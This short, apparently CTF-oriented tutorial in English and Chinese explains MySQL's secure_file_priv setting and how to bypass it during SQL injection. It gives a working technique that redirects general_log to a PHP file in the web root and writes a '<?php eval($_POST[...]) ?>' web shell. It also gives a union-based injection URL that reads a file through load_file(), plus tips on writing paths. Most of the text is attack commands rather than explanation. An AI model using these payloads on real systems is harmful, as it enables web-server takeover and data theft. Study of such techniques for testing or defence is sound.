1. MYSQL's new features limit file writing and alternative methods
Higher versions of MYSQL have added a new feature secure_file_priv, which restricts the permissions of mysql export files
secure_file_priv option
secure_file_priv
1、限制mysqld 不允许导入 | 导出
--secure_file_prive=null
2、限制mysqld 的导入 | 导出 只能发生在/tmp/目录下
--secure_file_priv=/tmp/
3、不对mysqld 的导入 | 导出做限制
--secure_file_priv=
linux
cat /etc/my.cnf
[mysqld]
secure_file_priv=
win
my.ini
[mysqld]
secure_file_priv=View secure_file_priv
show global variables like '%secure%';High privilege injection encounters secure_file_priv
There is no secure_file_priv option by default in the configuration file of the higher version of mysql, but you use the SQL statement to view secure_file_priv and find that if this option is not configured, it is NULL, which means that the file cannot be exported.
Alternative:
To know the path
set global general_log=on;set global general_log_file='C:/phpStudy/WWW/123.php';select '<?php eval($_POST[123]) ?>';
2 High-privilege file read and write
load_file() read file
http://test.com/sqli/Less-1/?id=-1' union select 1,load_file('c:\\flag.txt'),3 --+
1.路径使用\\ ,否则会被当作转义符号
2.路径使用/
3.盘符根路径下可用c:admin.txt
4.16进制文件名
5.char(路径ascii)into outfile / into dumpfile write file
